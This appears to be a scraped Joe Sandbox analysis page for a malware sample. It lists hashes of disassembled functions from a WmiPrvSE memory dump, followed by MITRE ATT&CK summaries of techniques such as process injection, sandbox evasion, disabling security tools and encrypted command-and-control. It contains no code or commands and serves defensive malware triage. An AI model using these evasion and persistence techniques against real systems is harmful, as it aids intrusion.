Instruction ID: dd2c654b8f22d18b2be2d3e45964146fb932e44ac23e8dc542ea7502014f4c12
Opcode Fuzzy Hash: d2cd863ca1c16a17e5194048ebeb0c7d64b5a8c8f8cde9a3d290e8548cc88cce
Instruction Fuzzy Hash: E7315E71E1EE8E9FDB55DBA4C8A04AC7BB1FF59300F1501BBD01AE71A2DE3969058B10

Function 00007FFD9BE8730B Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2162965956.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be80000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1313855bba78a53bbc0a39fdac43090f420c7012b9ca720baf95a3b5e95545e
Instruction ID: e56bca26fb40953793a2268dd7c379eb46df2bf0e8cf04c03dd79376ccf5ec2b
Opcode Fuzzy Hash: a1313855bba78a53bbc0a39fdac43090f420c7012b9ca720baf95a3b5e95545e
Instruction Fuzzy Hash: F7319E31B1AD0E8FEB54EA98D4A19A8B3A5FF58310B11813DD01ED3292DE357C12C780

Function 00007FFD9BE8F785 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2162965956.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be80000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cf8ce9631daa075e845fd0b434bcb02fd22887d1e2e465890d4740ac9ed80eb
Instruction ID: dcbe59927a8e1007b7dcedb8af0b017c3b4b7fd680e5bfbe7381547a95c23fbb
Opcode Fuzzy Hash: 7cf8ce9631daa075e845fd0b434bcb02fd22887d1e2e465890d4740ac9ed80eb
Instruction Fuzzy Hash: 93312C31E1ED4ECFEBB8DB9494615BD77B5FF48300F61067AD02EC61A1DA3A6A408781

Function 00007FFD9BE89F85 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2162965956.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be80000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86b05d5893b9df4403862c28eccf441b990e060a8ea99ca135b170fc7be1aa57
Instruction ID: ef5ffa3c79ab19201470aedf60a29351f5e0f7f4fcffeb1977513910f94c8fb8
Opcode Fuzzy Hash: 86b05d5893b9df4403862c28eccf441b990e060a8ea99ca135b170fc7be1aa57
Instruction Fuzzy Hash: D6313C30E0AD4ECFEBA8DB9484656BD77B9FF48300F51117AD02FD61A1CA3A6A409741

Function 00007FFD9BE873DE Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2162965956.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be80000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bb81f447f852bb9cee5baf8111f2d4429ec09be36c6968947449f0ddff71cdb
Instruction ID: b770042f580100b746a5d7913b70c82c4a49918ff02727e01decd12a003cf386
Opcode Fuzzy Hash: 3bb81f447f852bb9cee5baf8111f2d4429ec09be36c6968947449f0ddff71cdb
Instruction Fuzzy Hash: F1210461F0EE4E4FEB64E7A858322E8BBE4EF55310F150079D02EC36A2D92A69028345

Function 00007FFD9BE8E670 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2162965956.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be80000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67a8aaee049048f971751ade95b4b91493e5b080e88247f68c5466546b6644ba
Instruction ID: b11779738f32fc1396eaa54489610c0a4ef8d049f4b991279cdc6e6c9838ac34
Opcode Fuzzy Hash: 67a8aaee049048f971751ade95b4b91493e5b080e88247f68c5466546b6644ba
Instruction Fuzzy Hash: E1314910A1ED9A4AE739839884745747B65EF9231072947FAE0BECB4E7C93EB981C341

Function 00007FFD9BE88E70 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2162965956.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be80000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cf7308203d2c4454a799953c011793b5f06fbc9d8bafb5b4fb5a3d84e504625
Instruction ID: 1d8121f663eefd7311d1e7be6e4b807cc5cb3461ca3198dc7d4a4b8bf0de8565
Opcode Fuzzy Hash: 9cf7308203d2c4454a799953c011793b5f06fbc9d8bafb5b4fb5a3d84e504625
Instruction Fuzzy Hash: B7313810A1ED9E4AE339839444705B47B66EF913007194AB7D8AFCA4E7C57DB981D380

Function 00007FFD9BE8AF58 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2162965956.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be80000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c189055d51b5a63c52c35c62d67996088b199072d4b0fc52c6841edb663cb236
Instruction ID: 04104bc588d7b81f024b1e4831b4862dfd256efa843d06af9e018553c38b71ae
Opcode Fuzzy Hash: c189055d51b5a63c52c35c62d67996088b199072d4b0fc52c6841edb663cb236
Instruction Fuzzy Hash: 5D218C71E19D4E8FDBA5DB98C8609FDB7B5FF58300F110179E01AE72A1DE366A029740

Function 00007FFD9BE8CB1D Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2162965956.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be80000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21f564b1558c9d944710262ffde23e1ea840f0789f85da8d984230dcbb2f258d
Instruction ID: 341467b9ddffb0ef9443b60c6aa59b1dbcc960f82445846a1c074466de28d2a7
Opcode Fuzzy Hash: 21f564b1558c9d944710262ffde23e1ea840f0789f85da8d984230dcbb2f258d
Instruction Fuzzy Hash: 02214F31B09D0E9FDB58EA98D4A19B8F7A5FF59310B018139D01EC3692DF39B951C780

Function 00007FFD9BE85F7A Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2162965956.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be80000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d291dba9ac1f1df3cf2bf70ca6185e5b4ed1c4e17dd2f4707c31ebc41148ff08
Instruction ID: e480b97936c5be74428849af180d4168b3dced8b3e3828d1c4ea2ee4e404286d
Opcode Fuzzy Hash: d291dba9ac1f1df3cf2bf70ca6185e5b4ed1c4e17dd2f4707c31ebc41148ff08
Instruction Fuzzy Hash: 1C21AA11A0FECA4FF33743B418345B87E951F42264F1A01FAD4AA894F3DDAE1645A343

Function 00007FFD9BE84D88 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2162965956.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be80000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfdf13b1682de001182707c8855fe9091ec4a4288cdf5b1d0f63f97405437aec
Instruction ID: 3a4b08002dc666a21f12220fb457b00f0b7616b6ee8e3f5827d75e6da5920e6a
Opcode Fuzzy Hash: dfdf13b1682de001182707c8855fe9091ec4a4288cdf5b1d0f63f97405437aec
Instruction Fuzzy Hash: F821BE10A1DC6F46F638868484745B4725BFF94301B254A76D87FC74E6C97DBA81A780

Function 00007FFD9BE87F20 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2162965956.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be80000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0be8341e121d7de93419e94802f9a1e66e46130bd2b2ca7103c0d8bccc0e2232
Instruction ID: 8d1c1cfde34028f0f85546aaa2269ce18e26d4cdec4cecd7050ea0329ffae156
Opcode Fuzzy Hash: 0be8341e121d7de93419e94802f9a1e66e46130bd2b2ca7103c0d8bccc0e2232
Instruction Fuzzy Hash: 26110121B09E0E4FEB65FBA594219FA73E4EF54364B00063AD01EC35E2DE39B6458290

Function 00007FFD9BE8D720 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2162965956.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be80000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 504367d179c9c2d3779de31e1d637e352a432faa6e3dd5ff9d946da5265090a6
Instruction ID: 3d720add5f99c08cf826e0127c5e9689192a1567c858e5d08fa00fbeaf653a32
Opcode Fuzzy Hash: 504367d179c9c2d3779de31e1d637e352a432faa6e3dd5ff9d946da5265090a6
Instruction Fuzzy Hash: FE110421B0AE0E4FDB64FBA4D4214FA73D0FF54315B00463AD02EC35E2CE3AA5458280

Function 00007FFD9BE862E0 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2162965956.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be80000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b9ec94cfdfcde056a8d80b8d089b899acc41b3c4de326040c2e2b77d777606a
Instruction ID: d2b46d6a2f057a6d562743fcad84e0dd39d324ee42d9a99c32de0094d69e46ee
Opcode Fuzzy Hash: 4b9ec94cfdfcde056a8d80b8d089b899acc41b3c4de326040c2e2b77d777606a
Instruction Fuzzy Hash: BF110770A19D1D8FDBACDB58D465ABCB7B1EF98314F0101BEE01EE36A1CE35A9408B40

Function 00007FFD9BE87D9E Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2162965956.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be80000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 012fede898f8d140de961f586c9c4ff5406886e1a9e39aa3de4f9af585a1075f
Instruction ID: c246744efc4981d0f6f21449df67fa4b4ebf1bae59c3c13b02e2415f7126ead9
Opcode Fuzzy Hash: 012fede898f8d140de961f586c9c4ff5406886e1a9e39aa3de4f9af585a1075f
Instruction Fuzzy Hash: 9011253270AE0B8FE715EEA8D4256E533D4EF55361F01053AD529C32E1DA7AAA408680

Function 00007FFD9BE8D59E Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2162965956.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be80000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23570da29d2753e5014b00d0e477436053d250ccad18f582115e5acc4386fbab
Instruction ID: c32e47ec2283fd57a5327948af364f39aa484eced805f2d36d6527781e15905b
Opcode Fuzzy Hash: 23570da29d2753e5014b00d0e477436053d250ccad18f582115e5acc4386fbab
Instruction Fuzzy Hash: 10118831B0AE0F8FE715AAA8D4246E533C4EF50321F01423ED42DC32E1DE3AAA40C780

Function 00007FFD9BE8B7BC Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2162965956.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be80000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3aecdfea27eec616af02bd7a1e90f025823e9523c7a7aa2917b741b89e5c0e70
Instruction ID: 460feb3c54cda6c1966acda17af5546e197a33461f8e72cfc95c166ea0382a0b
Opcode Fuzzy Hash: 3aecdfea27eec616af02bd7a1e90f025823e9523c7a7aa2917b741b89e5c0e70
Instruction Fuzzy Hash: F7118E1AF1FE9F86F67815F834310BC75485F48720F1613BAD46E4A1E69C6F3A402382

Function 00007FFD9BE8BD3B Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2162965956.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be80000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbcf938c09ebd651734fbf1ca5eefccf2e7a1393c5f73d9e6ff9fce18f479d99
Instruction ID: b411122b91b55562aec8ec3bbdd88d1e0a483c316ec33c931a6119d4f7d1e976
Opcode Fuzzy Hash: bbcf938c09ebd651734fbf1ca5eefccf2e7a1393c5f73d9e6ff9fce18f479d99
Instruction Fuzzy Hash: 8A012C31908D4C8FCFA8EB58C854BE477B5EB98315F1401A9D40DE7291CA32AAC0CB40

Function 00007FFD9BE8BD3A Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2162965956.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be80000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84b09f18215ebf49d4cd53a6d38e60563f07b49e8bac18a889aa01c95053cd8b
Instruction ID: 040a8aa7efb224d65816ebb35d2ba66e06c1b256c098870945837a1bf70ce4a3
Opcode Fuzzy Hash: 84b09f18215ebf49d4cd53a6d38e60563f07b49e8bac18a889aa01c95053cd8b
Instruction Fuzzy Hash: 8C01EC31948D4C8FDFA8EF58C855BE877B1EBA8315F1401A9D40DE7291DA32AAC5CB40

Function 00007FFD9BE8BDB2 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2162965956.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be80000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f17889692cc28a20886411badc3165fed50d00b7cdf968e40c4d883f802c60b0
Instruction ID: a36e12e938228f0891fe30d629847c037889e5495725549031309ee2106e3681
Opcode Fuzzy Hash: f17889692cc28a20886411badc3165fed50d00b7cdf968e40c4d883f802c60b0
Instruction Fuzzy Hash: 01F02B3194E7CAAFE3128BF088215D53FB8AF03214F0A00F6D059CB0B2C93E1606C762

Function 00007FFD9BE865B2 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2162965956.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be80000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78cf8074167405130e7508470e164fe1385c7c2d56614829ae617e2f21dd2bbc
Instruction ID: 1bbf175c3d123d3c82a85bd7d6e16ad2b1f723c16aead3b73f60137225e2d2d9
Opcode Fuzzy Hash: 78cf8074167405130e7508470e164fe1385c7c2d56614829ae617e2f21dd2bbc
Instruction Fuzzy Hash: 41F0963144EAC99FD7128BF088219D53FB8AF03214B0A01FAE459CB0B2C53D1756C761

Function 00007FFD9BE8CAA2 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2162965956.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be80000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65ce0a0d7204289282902fccc0ff27642d4b149cae55606403732b96881cd7c2
Instruction ID: 7269e9b39e8d3fab0f39679c9181ba414c12da4626cff1ac378dda0e92d25fc0
Opcode Fuzzy Hash: 65ce0a0d7204289282902fccc0ff27642d4b149cae55606403732b96881cd7c2
Instruction Fuzzy Hash: 4DD01242F0EFCB4BE77A8AA408B10642F9C8F07240B1B15F7D5664E3E7D9692A459251

Function 00007FFD9BE8D57B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2162965956.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be80000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05f092ddd65427193150ed79bbbec3dab1ce8f5eb3647e37a21fcb98ab4d372b
Instruction ID: 37949fa01c5158ef182d68362c8a87d1cae0756437d1c6dad0416f352f8068b0
Opcode Fuzzy Hash: 05f092ddd65427193150ed79bbbec3dab1ce8f5eb3647e37a21fcb98ab4d372b
Instruction Fuzzy Hash: 7ED09210F0FD0FD6F1385A81903023A25989F04304E62913FD07F418E5CD3FBA116201

Function 00007FFD9BE87D7B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2162965956.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be80000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ebdd21e8e551f126acfb6e59972b983eac48407ba40d3edc4c95dcc504d1389
Instruction ID: b5d94b6593aea29aa130361d1edfc577239b7196658140da08463690e084816e
Opcode Fuzzy Hash: 9ebdd21e8e551f126acfb6e59972b983eac48407ba40d3edc4c95dcc504d1389
Instruction Fuzzy Hash: 9ED09224B1FD0F85F1389682817033A61AA8F42300E26843DD0BF418F2893A7B01660A

Function 00007FFD9BE872C1 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2162965956.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be80000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8eb7553029b7459d8c58029937b0f351018fbf2bbf0aac4bab1c8ed326bdf7fd
Instruction ID: 4120663de48fa3560c6b7152b238c2d0e442d6fb3fd3d9d9672e31b929cb51b3
Opcode Fuzzy Hash: 8eb7553029b7459d8c58029937b0f351018fbf2bbf0aac4bab1c8ed326bdf7fd
Instruction Fuzzy Hash: F5B09200F0EE0B43F13040E004A003C04880B85200E520938A13E491E2EC7E2A001224

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 9D7RwuJrth.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

